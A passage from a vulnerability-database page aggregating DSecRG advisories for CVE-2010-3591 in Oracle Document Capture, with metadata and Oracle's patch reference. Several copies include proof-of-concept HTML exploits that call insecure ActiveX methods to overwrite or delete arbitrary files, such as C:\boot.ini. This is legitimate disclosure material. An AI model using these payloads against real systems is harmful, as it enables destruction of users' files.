which is contains insecure method "SaveLayoutChanges" that can overwrite any
unhidden file in system.
Class ActiveBar2
GUID: {4932CEF4-2CAA-11D2-A165-0060081C43D9}
Number of Interfaces: 1
Default Interface: IActiveBar2
RegKey Safe for Script: True
RegKey Safe for Init: True
KillBitSet: False
Exploit
Attacker can construct html page which call vulnerable function
"SaveLayoutChanges" from ActiveX component Actbar2.ocx
Is one of the leading IT security companies in CEMEA, providing information
security consulting, audit and penetration testing services, ERP and SAP security
assessment, certification for ISO/IEC 27001:2005 and PCI DSS and PA DSS standards.
Digital Security Research Group:
International subdivision of Digital Security company focused on research and
software development for securing business-critical systems like: enterprise
applications (ERP,CRM,SRM), technology systems (SCADA, Smart Grid) and banking
software. DSecRG developed new product "ERPSCAN security suite for SAP NetWeaver"
and service "ERPSCAN Online" which can help customers to perform automated security
assessments and compliance checks for SAP solutions.
Contact: research [at] dsecrg [dot] com
http://www.dsecrg.com
http://www.erpscan.com
Polyakov Alexandr. PCI QSA,PA-QSA
CTO Digital Security
Head of DSecRG
This message and any attachment are confidential and may be privileged or
otherwise protected
from disclosure. If you are not the intended recipient any use, distribution,
copying or disclosure
is strictly prohibited. If you have received this message in error, please notify
the sender immediately
either by telephone or by e-mail and delete this message and any attachment from
your system. Correspondence
via e-mail is for information purposes only. Digital Security neither makes nor
accepts legally binding
statements by e-mail unless otherwise agreed.
{"id": "SECURITYVULNS:DOC:25556", "bulletinFamily": "software", "title": "[DSECRG-00153] Oracle Document Capture Actbar2.ocx - insecure method", "description": "ActiveX components contain insecure methods.\r\n\r\nDigital Security Research Group [DSecRG] Advisory #DSECRG-00153\r\n\r\n\r\n\r\nApplication: Oracle Document Capture\r\nVersions Affected: Release 10gR3\r\nVendor URL: www.oracle.com\r\nBugs: insecure method, File overwriting\r\nExploits: YES\r\nReported: 22.03.2010\r\nVendor response: 31.03.2010\r\nDate of Public Advisory:24.01.2011\r\nCVE-number: CVE-2010-3591\r\nAuthor: Evdokimov Dmitriy from Digital Security Research Group\r\n[DSecRG] (research [at] dsecrg [dot] com)\r\n\r\n\r\n\r\nDescription\r\n***********\r\n\r\nOracle Document Capture contains ActiveX components that contains insecure methods.\r\n\r\nInsecure method in Actbar2.ocx\r\n\r\n\r\nDetails\r\n*******\r\n\r\nOracle Document Capture contains ActiveX component ActiveBar2Library (Actbar2.ocx)\r\nLib GUID: {4932CEF1-2CAA-11D2-A165-0060081C43D9}\r\n\r\nwhich is contains insecure method "SaveLayoutChanges" that can overwrite any\r\nunhidden file in system. \r\n\r\nClass ActiveBar2\r\nGUID: {4932CEF4-2CAA-11D2-A165-0060081C43D9}\r\nNumber of Interfaces: 1\r\nDefault Interface: IActiveBar2\r\nRegKey Safe for Script: True\r\nRegKey Safe for Init: True\r\nKillBitSet: False\r\n\r\n\r\n\r\nExploit\r\n*******\r\n\r\nAttacker can construct html page which call vulnerable function\r\n"SaveLayoutChanges" from ActiveX component Actbar2.ocx\r\n\r\nExample:\r\n\r\n<HTML>\r\n <HEAD>\r\n <TITLE>DSecRG</TITLE>\r\n </HEAD>\r\n <BODY>\r\n \r\n <OBJECT id='eds'\r\nclassid='clsid:4932CEF4-2CAA-11D2-A165-0060081C43D9'></OBJECT>\r\n \r\n <SCRIPT>\r\n \r\n function Exploit(){\r\n eds.SaveLayoutChanges("C:\\31337.txt",1); \r\n }\r\n Exploit();\r\n \r\n </SCRIPT>\r\n</BODY>\r\n</HTML>\r\n\r\n\r\n\r\nReferences\r\n**********\r\n\r\nhttp://dsecrg.com/pages/vul/show.php?id=304\r\nhttp://www.oracle.com/technetwork/topics/security/cpujan2011-194091.html\r\n\r\n\r\n\r\n\r\nFix Information\r\n*************\r\n\r\nInformation was published in CPU Jan 2011.\r\nAll customers can download CPU patches following instructions from: \r\n\r\nhttp://www.oracle.com/technetwork/topics/security/cpujan2011-194091.html\r\n\r\n\r\nAbout\r\n*****\r\n\r\nDigital Security: \r\n\r\nIs one of the leading IT security companies in CEMEA, providing information\r\nsecurity consulting, audit and penetration testing services, ERP and SAP security\r\nassessment, certification for ISO/IEC 27001:2005 and PCI DSS and PA DSS standards.\r\n\r\nDigital Security Research Group:\r\n\r\nInternational subdivision of Digital Security company focused on research and\r\nsoftware development for securing business-critical systems like: enterprise\r\napplications (ERP,CRM,SRM), technology systems (SCADA, Smart Grid) and banking\r\nsoftware. DSecRG developed new product "ERPSCAN security suite for SAP NetWeaver"\r\nand service "ERPSCAN Online" which can help customers to perform automated security\r\nassessments and compliance checks for SAP solutions.\r\n\r\n\r\nContact: research [at] dsecrg [dot] com\r\nhttp://www.dsecrg.com\r\nhttp://www.erpscan.com\r\n\r\n\r\n\r\n\r\n\r\nPolyakov Alexandr. PCI QSA,PA-QSA\r\nCTO Digital Security\r\nHead of DSecRG\r\n______________________\r\nDIGITAL SECURITY\r\nphone: +7 812 703 1547\r\n +7 812 430 9130\r\ne-mail: a.polyakov@dsec.ru \r\n\r\nwww.dsec.ru\r\nwww.dsecrg.com www.dsecrg.ru\r\nwww.erpscan.com www.erpscan.ru\r\nwww.pcidssru.com www.pcidss.ru\r\n\r\n\r\n-----------------------------------\r\nThis message and any attachment are confidential and may be privileged or\r\notherwise protected \r\nfrom disclosure. If you are not the intended recipient any use, distribution,\r\ncopying or disclosure \r\nis strictly prohibited. If you have received this message in error, please notify\r\nthe sender immediately \r\neither by telephone or by e-mail and delete this message and any attachment from\r\nyour system. Correspondence \r\nvia e-mail is for information purposes only. Digital Security neither makes nor\r\naccepts legally binding \r\nstatements by e-mail unless otherwise agreed. \r\n-----------------------------------", "published": "2011-01-26T00:00:00", "modified": "2011-01-26T00:00:00", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:25556", "reporter": "Securityvulns", "references": [], "cvelist": ["CVE-2010-3591"], "type": "securityvulns", "lastseen": "2018-08-31T11:10:38", "edition": 1, "viewCount": 68, "enchantments": {"score": {"value": 6.3, "vector": "NONE"}, "dependencies": {"references": [{"type": "cve", "idList": ["CVE-2010-3591"]}, {"type": "erpscan", "idList": ["ERPSCAN-11-005"]}, {"type": "exploitdb", "idList": ["EDB-ID:16053", "EDB-ID:16055"]}, {"type": "exploitpack", "idList": ["EXPLOITPACK:D3D5A5A3F1D5DB6D6E0E319332895B56", "EXPLOITPACK:E67211FD19699AA1B1D6AF323C8719DF"]}, {"type": "nessus", "idList": ["ORACLE_DOCUMENT_CAPTURE_ACTIVEX.NASL"]}, {"type": "oracle", "idList": ["ORACLE:CPUJAN2011-194091"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:97866", "PACKETSTORM:97868"]}, {"type": "securityvulns", "idList": ["SECURITYVULNS:DOC:25555", "SECURITYVULNS:VULN:11380"]}, {"type": "seebug", "idList": ["SSV:70620", "SSV:70622"]}]}, "backreferences": {"references": [{"type": "cve", "idList": ["CVE-2010-3591"]}, {"type": "erpscan", "idList": ["ERPSCAN-11-005"]}, {"type": "exploitdb", "idList": ["EDB-ID:16053", "EDB-ID:16055"]}, {"type": "exploitpack", "idList": ["EXPLOITPACK:D3D5A5A3F1D5DB6D6E0E319332895B56"]}, {"type": "oracle", "idList": ["ORACLE:CPUJAN2011-194091"]}, {"type": "securityvulns", "idList": ["SECURITYVULNS:DOC:25555"]}]}, "exploitation": null, "vulnersScore": 6.3}, "affectedSoftware": [], "immutableFields": [], "cvss2": {}, "cvss3": {}, "_state": {"dependencies": 1647589307, "score": 0}}
{"securityvulns": [{"lastseen": "2018-08-31T11:10:38", "bulletinFamily": "software", "cvelist": ["CVE-2010-3591"], "description": "\r\nActiveX components contain insecure methods.\r\n\r\nDigital Security Research Group [DSecRG] Advisory DSECRG-11-005 (internal\r\n#DSECRG-00154) \r\n\r\n\r\nApplication: Oracle Document Capture\r\nVersions Affected: Release 10gR3\r\nVendor URL: www.oracle.com\r\nBugs: insecure method, File overwriting, File deleting\r\nExploits: YES\r\nReported: 22.03.2010\r\nVendor response: 31.03.2010\r\nDate of Public Advisory:24.01.2011\r\nCVE-number: CVE-2010-3591\r\nAuthor: Evdokimov Dmitriy from Digital Security Research Group\r\n[DSecRG] (research [at] dsecrg [dot] com)\r\n\r\n\r\n\r\nDescription\r\n***********\r\n\r\nOracle Document Capture contains ActiveX components that contains insecure methods\r\nin empop3.dll\r\n\r\n\r\nDetails\r\n*******\r\n\r\n\r\nOracle Document Capture contains ActiveX component EMPOP3Lib (empop3.dll) Lib\r\nGUID: {F647CBE5-3C01-402A-B3F0-502A77054A24}\r\n\r\nwhich is contains insecure method "DownloadSingleMessageToFile" that can delete\r\nany file in system. \r\n\r\nClass EasyMailPop3\r\nGUID: {F647CBE5-3C01-402A-B3F0-502A77054A24}\r\nNumber of Interfaces: 1\r\nDefault Interface: IPOP3Main\r\nRegKey Safe for Script: False\r\nRegkeySafe for Init: False\r\nKillBitSet: False\r\n\r\n\r\n\r\nDetails\r\n*******\r\n\r\nAttacker can construct html page which call vulnerable function\r\n"DownloadSingleMessageToFile" from ActiveX component empop3.dll\r\n\r\nExample:\r\n\r\n<HTML>\r\n <HEAD>\r\n <TITLE>DSecRG</TITLE>\r\n </HEAD>\r\n <BODY>\r\n \r\n <OBJECT id='eds'\r\nclassid='clsid:F647CBE5-3C01-402A-B3F0-502A77054A24'></OBJECT>\r\n \r\n <SCRIPT>\r\n \r\n function Exploit(){\r\n eds.DownloadSingleMessageToFile(1,"C:\\boot.ini",1); \r\n }\r\n Exploit();\r\n \r\n </SCRIPT>\r\n</BODY>\r\n</HTML>\r\n\r\n\r\nReferences\r\n**********\r\n\r\nhttp://dsecrg.com/pages/vul/show.php?id=305\r\nhttp://www.oracle.com/technetwork/topics/security/cpujan2011-194091.html\r\n\r\n\r\n\r\n\r\nFix Information\r\n*************\r\n\r\nInformation was published in CPU Jan 2011.\r\nAll customers can download CPU patches following instructions from: \r\n\r\nhttp://www.oracle.com/technetwork/topics/security/cpujan2011-194091.html\r\n\r\n\r\nAbout\r\n*****\r\n\r\nDigital Security: \r\n\r\nIs one of the leading IT security companies in CEMEA, providing information\r\nsecurity consulting, audit and penetration testing services, ERP and SAP security\r\nassessment, certification for ISO/IEC 27001:2005 and PCI DSS and PA DSS standards.\r\n\r\nDigital Security Research Group:\r\n\r\nInternational subdivision of Digital Security company focused on research and\r\nsoftware development for securing business-critical systems like: enterprise\r\napplications (ERP,CRM,SRM), technology systems (SCADA, Smart Grid) and banking\r\nsoftware. DSecRG developed new product "ERPSCAN security suite for SAP NetWeaver"\r\nand service "ERPSCAN Online" which can help customers to perform automated security\r\nassessments and compliance checks for SAP solutions.\r\n\r\n\r\nContact: research [at] dsecrg [dot] com\r\nhttp://www.dsecrg.com\r\nhttp://www.erpscan.com\r\n\r\n\r\n\r\n\r\nPolyakov Alexandr. PCI QSA,PA-QSA\r\nCTO Digital Security\r\nHead of DSecRG\r\n______________________\r\nDIGITAL SECURITY\r\nphone: +7 812 703 1547\r\n +7 812 430 9130\r\ne-mail: a.polyakov@dsec.ru \r\n\r\nwww.dsec.ru\r\nwww.dsecrg.com www.dsecrg.ru\r\nwww.erpscan.com www.erpscan.ru\r\nwww.pcidssru.com www.pcidss.ru\r\n\r\n\r\n-----------------------------------\r\nThis message and any attachment are confidential and may be privileged or\r\notherwise protected \r\nfrom disclosure. If you are not the intended recipient any use, distribution,\r\ncopying or disclosure \r\nis strictly prohibited. If you have received this message in error, please notify\r\nthe sender immediately \r\neither by telephone or by e-mail and delete this message and any attachment from\r\nyour system. Correspondence \r\nvia e-mail is for information purposes only. Digital Security neither makes nor\r\naccepts legally binding \r\nstatements by e-mail unless otherwise agreed. \r\n-----------------------------------", "edition": 1, "modified": "2011-01-26T00:00:00", "published": "2011-01-26T00:00:00", "id": "SECURITYVULNS:DOC:25555", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:25555", "title": "[DSECRG-11-005] Oracle Document Capture empop3.dll - insecure method", "type": "securityvulns", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2021-06-08T18:46:13", "description": "Quarterly security update closes nearly 70 different vulnerabilities in all applications.", "edition": 2, "cvss3": {}, "published": "2011-02-26T00:00:00", "title": "Oracle / Sun / Peoplesoft / Open Office applications multiple security vulnerabilities", "type": "securityvulns", "bulletinFamily": "software", "cvss2": {}, "cvelist": ["CVE-2010-3598", "CVE-2010-4428", "CVE-2010-4459", "CVE-2010-4445", "CVE-2010-4416", "CVE-2010-4429", "CVE-2010-3505", "CVE-2010-4420", "CVE-2010-4458", "CVE-2010-2632", "CVE-2010-1227", "CVE-2010-4439", "CVE-2010-4444", "CVE-2010-3599", "CVE-2010-3594", "CVE-2010-4425", "CVE-2010-3589", "CVE-2010-4433", "CVE-2010-3593", "CVE-2010-4426", "CVE-2010-4453", "CVE-2010-4436", "CVE-2010-2935", "CVE-2010-3597", "CVE-2010-4427", "CVE-2010-3592", "CVE-2010-4423", "CVE-2010-3574", "CVE-2010-4441", "CVE-2010-4461", "CVE-2010-4419", "CVE-2010-4435", "CVE-2010-3600", "CVE-2010-4431", "CVE-2010-4455", "CVE-2009-4269", "CVE-2009-3555", "CVE-2010-4457", "CVE-2010-4417", "CVE-2010-3590", "CVE-2010-4442", "CVE-2010-4464", "CVE-2010-4456", "CVE-2010-4443", "CVE-2010-4414", "CVE-2010-3595", "CVE-2010-4413", "CVE-2010-4415", "CVE-2010-4418", "CVE-2010-4434", "CVE-2010-4421", "CVE-2010-2936", "CVE-2010-4430", "CVE-2010-4437", "CVE-2010-3588", "CVE-2010-3510", "CVE-2010-4424", "CVE-2010-4449", "CVE-2010-3586", "CVE-2010-3591", "CVE-2010-4446", "CVE-2010-4432", "CVE-2010-3587", "CVE-2010-4460", "CVE-2010-4438", "CVE-2010-4440"], "modified": "2011-02-26T00:00:00", "id": "SECURITYVULNS:VULN:11380", "href": "https://vulners.com/securityvulns/SECURITYVULNS:VULN:11380", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "erpscan": [{"lastseen": "2020-09-15T10:41:39", "description": "**Application:** Oracle Document Capture \n**Versions Affected:** 6.4 \u2014 7.2 \n**Vendor URL:** [http://www.oracle.com](<http://www.oracle.com/>) \n**Bugs:** Insecure method, File overwriting, File deleting \n**Exploits:** YES \n**Reported:** 22.03.2010 \n**Vendor response:** 31.03.2010 \n**Date of Public Advisory:** 24.01.2011 \n**CVE-number:**CVE-2010-3591 \n**Author:** Evdokimov Dmitriy \n\n**Description** \nOracle Document Capture contains ActiveX components that contain insecure methods in empop3.dll.\n\n**Business Risk** \nAn attacker can send a malicious link to an unaware user via an e-mail, messaging or social networks. He also can insert this link into corporate portal. When clicking this link the end user browser will call vulnerable ActiveX component which can delete any file on victim\u2019s workstation. It is possible to delete configuration files of critical binaries that can lead to denial of service attack and stopping business until files will be repaired. This scenario is critical if user works with SAP for Logistics or SAP for Banking applications.\n", "edition": 7, "published": "2010-03-22T00:00:00", "title": "Oracle Document Capture empop3.dll \u2014 insecure method", "type": "erpscan", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2010-3591"], "modified": "2010-03-22T00:00:00", "id": "ERPSCAN-11-005", "href": "https://erpscan.io/advisories/erpscan-11-005-oracle-document-capture-empop3-dll-insecure-method/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "seebug": [{"lastseen": "2017-11-19T16:54:37", "description": "No description provided by source.", "published": "2014-07-01T00:00:00", "title": "Oracle Document Capture empop3.dll Insecure Methods", "type": "seebug", "bulletinFamily": "exploit", "cvelist": ["CVE-2010-3591"], "modified": "2014-07-01T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-70622", "id": "SSV:70622", "sourceData": "\n Source: http://packetstormsecurity.org/files/view/97868/DSECRG-11-005.txt\r\n\r\nActiveX components contain insecure methods.\r\n\r\nDigital Security Research Group [DSecRG] Advisory DSECRG-11-005 (internal #DSECRG-00154) \r\n\r\n\r\nApplication: Oracle Document Capture\r\nVersions Affected: Release 10gR3\r\nVendor URL: www.oracle.com\r\nBugs: insecure method, File overwriting, File deleting\r\nExploits: YES\r\nReported: 22.03.2010\r\nVendor response: 31.03.2010\r\nDate of Public Advisory:24.01.2011\r\nCVE-number: CVE-2010-3591\r\nAuthor: Evdokimov Dmitriy from Digital Security Research Group [DSecRG] (research [at] dsecrg [dot] com)\r\n\r\n\r\n\r\nDescription\r\n***********\r\n\r\nOracle Document Capture contains ActiveX components that contains insecure methods in empop3.dll\r\n\r\n\r\nDetails\r\n*******\r\n\r\n\r\nOracle Document Capture contains ActiveX component EMPOP3Lib (empop3.dll) Lib GUID: {F647CBE5-3C01-402A-B3F0-502A77054A24}\r\n\r\nwhich is contains insecure method "DownloadSingleMessageToFile" that can delete any file in system. \r\n\r\nClass EasyMailPop3\r\nGUID: {F647CBE5-3C01-402A-B3F0-502A77054A24}\r\nNumber of Interfaces: 1\r\nDefault Interface: IPOP3Main\r\nRegKey Safe for Script: False\r\nRegkeySafe for Init: False\r\nKillBitSet: False\r\n\r\n\r\n\r\nDetails\r\n*******\r\n\r\nAttacker can construct html page which call vulnerable function "DownloadSingleMessageToFile" from ActiveX component empop3.dll\r\n\r\nExample:\r\n\r\n<HTML>\r\n <HEAD>\r\n <TITLE>DSecRG</TITLE>\r\n </HEAD>\r\n <BODY>\r\n \r\n <OBJECT id='eds' classid='clsid:F647CBE5-3C01-402A-B3F0-502A77054A24'></OBJECT>\r\n \r\n <SCRIPT>\r\n \r\n function Exploit(){\r\n eds.DownloadSingleMessageToFile(1,"C:\\\\boot.ini",1); \r\n }\r\n Exploit();\r\n \r\n </SCRIPT>\r\n</BODY>\r\n</HTML>\r\n\r\n\r\nReferences\r\n**********\r\n\r\nhttp://dsecrg.com/pages/vul/show.php?id=305\r\nhttp://www.oracle.com/technetwork/topics/security/cpujan2011-194091.html\r\n\r\n\r\n\r\n\r\nFix Information\r\n*************\r\n\r\nInformation was published in CPU Jan 2011.\r\nAll customers can download CPU patches following instructions from: \r\n\r\nhttp://www.oracle.com/technetwork/topics/security/cpujan2011-194091.html\r\n\r\n\r\nAbout\r\n*****\r\n\r\nDigital Security: \r\n\r\nIs one of the leading IT security companies in CEMEA, providing information security consulting, audit and penetration testing services, ERP and SAP security assessment, certification for ISO/IEC 27001:2005 and PCI DSS and PA DSS standards.\r\n\r\nDigital Security Research Group:\r\n\r\nInternational subdivision of Digital Security company focused on research and software development for securing business-critical systems like: enterprise applications (ERP,CRM,SRM), technology systems (SCADA, Smart Grid) and banking software. DSecRG developed new product "ERPSCAN security suite for SAP NetWeaver" and service "ERPSCAN Online" which can help customers to perform automated security assessments and compliance checks for SAP solutions.\r\n\r\n\r\nContact: research [at] dsecrg [dot] com\r\nhttp://www.dsecrg.com\r\nhttp://www.erpscan.com\r\n\r\n\r\n\r\n\r\nPolyakov Alexandr. PCI QSA,PA-QSA\r\nCTO Digital Security\r\nHead of DSecRG\r\n______________________\r\nDIGITAL SECURITY\r\nphone: +7 812 703 1547\r\n +7 812 430 9130\r\ne-mail: a.polyakov@dsec.ru \r\n\r\nwww.dsec.ru\r\nwww.dsecrg.com www.dsecrg.ru\r\nwww.erpscan.com www.erpscan.ru\r\nwww.pcidssru.com www.pcidss.ru\r\n\r\n\r\n-----------------------------------\r\nThis message and any attachment are confidential and may be privileged or otherwise protected \r\nfrom disclosure. If you are not the intended recipient any use, distribution, copying or disclosure \r\nis strictly prohibited. If you have received this message in error, please notify the sender immediately \r\neither by telephone or by e-mail and delete this message and any attachment from your system. Correspondence \r\nvia e-mail is for information purposes only. Digital Security neither makes nor accepts legally binding \r\nstatements by e-mail unless otherwise agreed. \r\n-----------------------------------\r\n\n ", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://www.seebug.org/vuldb/ssvid-70622"}, {"lastseen": "2017-11-19T16:51:47", "description": "No description provided by source.", "published": "2014-07-01T00:00:00", "title": "Oracle Document Capture Actbar2.ocx Insecure Method", "type": "seebug", "bulletinFamily": "exploit", "cvelist": ["CVE-2010-3591"], "modified": "2014-07-01T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-70620", "id": "SSV:70620", "sourceData": "\n Source: http://packetstormsecurity.org/files/view/97866/DSECRG-11-004.txt\r\n\r\nActiveX components contain insecure methods.\r\n\r\nDigital Security Research Group [DSecRG] Advisory #DSECRG-00153\r\n\r\n\r\n\r\nApplication: Oracle Document Capture\r\nVersions Affected: Release 10gR3\r\nVendor URL: www.oracle.com\r\nBugs: insecure method, File overwriting\r\nExploits: YES\r\nReported: 22.03.2010\r\nVendor response: 31.03.2010\r\nDate of Public Advisory:24.01.2011\r\nCVE-number: CVE-2010-3591\r\nAuthor: Evdokimov Dmitriy from Digital Security Research Group [DSecRG] (research [at] dsecrg [dot] com)\r\n\r\n\r\n\r\nDescription\r\n***********\r\n\r\nOracle Document Capture contains ActiveX components that contains insecure methods.\r\n\r\nInsecure method in Actbar2.ocx\r\n\r\n\r\nDetails\r\n*******\r\n\r\nOracle Document Capture contains ActiveX component ActiveBar2Library (Actbar2.ocx) Lib GUID: {4932CEF1-2CAA-11D2-A165-0060081C43D9}\r\n\r\nwhich is contains insecure method "SaveLayoutChanges" that can overwrite any unhidden file in system. \r\n\r\nClass ActiveBar2\r\nGUID: {4932CEF4-2CAA-11D2-A165-0060081C43D9}\r\nNumber of Interfaces: 1\r\nDefault Interface: IActiveBar2\r\nRegKey Safe for Script: True\r\nRegKey Safe for Init: True\r\nKillBitSet: False\r\n\r\n\r\n\r\nExploit\r\n*******\r\n\r\nAttacker can construct html page which call vulnerable function "SaveLayoutChanges" from ActiveX component Actbar2.ocx\r\n\r\nExample:\r\n\r\n<HTML>\r\n <HEAD>\r\n <TITLE>DSecRG</TITLE>\r\n </HEAD>\r\n <BODY>\r\n \r\n <OBJECT id='eds' classid='clsid:4932CEF4-2CAA-11D2-A165-0060081C43D9'></OBJECT>\r\n \r\n <SCRIPT>\r\n \r\n function Exploit(){\r\n eds.SaveLayoutChanges("C:\\\\31337.txt",1); \r\n }\r\n Exploit();\r\n \r\n </SCRIPT>\r\n</BODY>\r\n</HTML>\r\n\r\n\r\n\r\nReferences\r\n**********\r\n\r\nhttp://dsecrg.com/pages/vul/show.php?id=304\r\nhttp://www.oracle.com/technetwork/topics/security/cpujan2011-194091.html\r\n\r\n\r\n\r\n\r\nFix Information\r\n*************\r\n\r\nInformation was published in CPU Jan 2011.\r\nAll customers can download CPU patches following instructions from: \r\n\r\nhttp://www.oracle.com/technetwork/topics/security/cpujan2011-194091.html\r\n\r\n\r\nAbout\r\n*****\r\n\r\nDigital Security: \r\n\r\nIs one of the leading IT security companies in CEMEA, providing information security consulting, audit and penetration testing services, ERP and SAP security assessment, certification for ISO/IEC 27001:2005 and PCI DSS and PA DSS standards.\r\n\r\nDigital Security Research Group:\r\n\r\nInternational subdivision of Digital Security company focused on research and software development for securing business-critical systems like: enterprise applications (ERP,CRM,SRM), technology systems (SCADA, Smart Grid) and banking software. DSecRG developed new product "ERPSCAN security suite for SAP NetWeaver" and service "ERPSCAN Online" which can help customers to perform automated security assessments and compliance checks for SAP solutions.\r\n\r\n\r\nContact: research [at] dsecrg [dot] com\r\nhttp://www.dsecrg.com\r\nhttp://www.erpscan.com\r\n\r\n\r\n\r\n\r\n\r\nPolyakov Alexandr. PCI QSA,PA-QSA\r\nCTO Digital Security\r\nHead of DSecRG\r\n______________________\r\nDIGITAL SECURITY\r\nphone: +7 812 703 1547\r\n +7 812 430 9130\r\ne-mail: a.polyakov@dsec.ru \r\n\r\nwww.dsec.ru\r\nwww.dsecrg.com www.dsecrg.ru\r\nwww.erpscan.com www.erpscan.ru\r\nwww.pcidssru.com www.pcidss.ru\r\n\r\n\r\n-----------------------------------\r\nThis message and any attachment are confidential and may be privileged or otherwise protected \r\nfrom disclosure. If you are not the intended recipient any use, distribution, copying or disclosure \r\nis strictly prohibited. If you have received this message in error, please notify the sender immediately \r\neither by telephone or by e-mail and delete this message and any attachment from your system. Correspondence \r\nvia e-mail is for information purposes only. Digital Security neither makes nor accepts legally binding \r\nstatements by e-mail unless otherwise agreed. \r\n-----------------------------------\r\n\n ", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://www.seebug.org/vuldb/ssvid-70620"}], "packetstorm": [{"lastseen": "2016-12-05T22:14:41", "description": "", "published": "2011-01-25T00:00:00", "type": "packetstorm", "title": "Oracle Document Capture Actbar2.ocx Insecure Method", "bulletinFamily": "exploit", "cvelist": ["CVE-2010-3591"], "modified": "2011-01-25T00:00:00", "id": "PACKETSTORM:97866", "href": "https://packetstormsecurity.com/files/97866/Oracle-Document-Capture-Actbar2.ocx-Insecure-Method.html", "sourceData": "`ActiveX components contain insecure methods. \n \nDigital Security Research Group [DSecRG] Advisory #DSECRG-00153 \n \n \n \nApplication: Oracle Document Capture \nVersions Affected: Release 10gR3 \nVendor URL: www.oracle.com \nBugs: insecure method, File overwriting \nExploits: YES \nReported: 22.03.2010 \nVendor response: 31.03.2010 \nDate of Public Advisory:24.01.2011 \nCVE-number: CVE-2010-3591 \nAuthor: Evdokimov Dmitriy from Digital Security Research Group [DSecRG] (research [at] dsecrg [dot] com) \n \n \n \nDescription \n*********** \n \nOracle Document Capture contains ActiveX components that contains insecure methods. \n \nInsecure method in Actbar2.ocx \n \n \nDetails \n******* \n \nOracle Document Capture contains ActiveX component ActiveBar2Library (Actbar2.ocx) Lib GUID: {4932CEF1-2CAA-11D2-A165-0060081C43D9} \n \nwhich is contains insecure method \"SaveLayoutChanges\" that can overwrite any unhidden file in system. \n \nClass ActiveBar2 \nGUID: {4932CEF4-2CAA-11D2-A165-0060081C43D9} \nNumber of Interfaces: 1 \nDefault Interface: IActiveBar2 \nRegKey Safe for Script: True \nRegKey Safe for Init: True \nKillBitSet: False \n \n \n \nExploit \n******* \n \nAttacker can construct html page which call vulnerable function \"SaveLayoutChanges\" from ActiveX component Actbar2.ocx \n \nExample: \n \n<HTML> \n<HEAD> \n<TITLE>DSecRG</TITLE> \n</HEAD> \n<BODY> \n \n<OBJECT id='eds' classid='clsid:4932CEF4-2CAA-11D2-A165-0060081C43D9'></OBJECT> \n \n<SCRIPT> \n \nfunction Exploit(){ \neds.SaveLayoutChanges(\"C:\\\\31337.txt\",1); \n} \nExploit(); \n \n</SCRIPT> \n</BODY> \n</HTML> \n \n \n \nReferences \n********** \n \nhttp://dsecrg.com/pages/vul/show.php?id=304 \nhttp://www.oracle.com/technetwork/topics/security/cpujan2011-194091.html \n \n \n \n \nFix Information \n************* \n \nInformation was published in CPU Jan 2011. \nAll customers can download CPU patches following instructions from: \n \nhttp://www.oracle.com/technetwork/topics/security/cpujan2011-194091.html \n \n \nAbout \n***** \n \nDigital Security: \n \nIs one of the leading IT security companies in CEMEA, providing information security consulting, audit and penetration testing services, ERP and SAP security assessment, certification for ISO/IEC 27001:2005 and PCI DSS and PA DSS standards. \n \nDigital Security Research Group: \n \nInternational subdivision of Digital Security company focused on research and software development for securing business-critical systems like: enterprise applications (ERP,CRM,SRM), technology systems (SCADA, Smart Grid) and banking software. DSecRG developed new product \"ERPSCAN security suite for SAP NetWeaver\" and service \"ERPSCAN Online\" which can help customers to perform automated security assessments and compliance checks for SAP solutions. \n \n \nContact: research [at] dsecrg [dot] com \nhttp://www.dsecrg.com \nhttp://www.erpscan.com \n \n \n \n \n \nPolyakov Alexandr. PCI QSA,PA-QSA \nCTO Digital Security \nHead of DSecRG \n______________________ \nDIGITAL SECURITY \nphone: +7 812 703 1547 \n+7 812 430 9130 \ne-mail: a.polyakov@dsec.ru \n \nwww.dsec.ru \nwww.dsecrg.com www.dsecrg.ru \nwww.erpscan.com www.erpscan.ru \nwww.pcidssru.com www.pcidss.ru \n \n \n----------------------------------- \nThis message and any attachment are confidential and may be privileged or otherwise protected \nfrom disclosure. If you are not the intended recipient any use, distribution, copying or disclosure \nis strictly prohibited. If you have received this message in error, please notify the sender immediately \neither by telephone or by e-mail and delete this message and any attachment from your system. Correspondence \nvia e-mail is for information purposes only. Digital Security neither makes nor accepts legally binding \nstatements by e-mail unless otherwise agreed. \n----------------------------------- \n`\n", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://packetstormsecurity.com/files/download/97866/DSECRG-11-004.txt"}, {"lastseen": "2016-12-05T22:15:45", "description": "", "published": "2011-01-25T00:00:00", "type": "packetstorm", "title": "Oracle Document Capture empop3.dll Insecure Methods", "bulletinFamily": "exploit", "cvelist": ["CVE-2010-3591"], "modified": "2011-01-25T00:00:00", "id": "PACKETSTORM:97868", "href": "https://packetstormsecurity.com/files/97868/Oracle-Document-Capture-empop3.dll-Insecure-Methods.html", 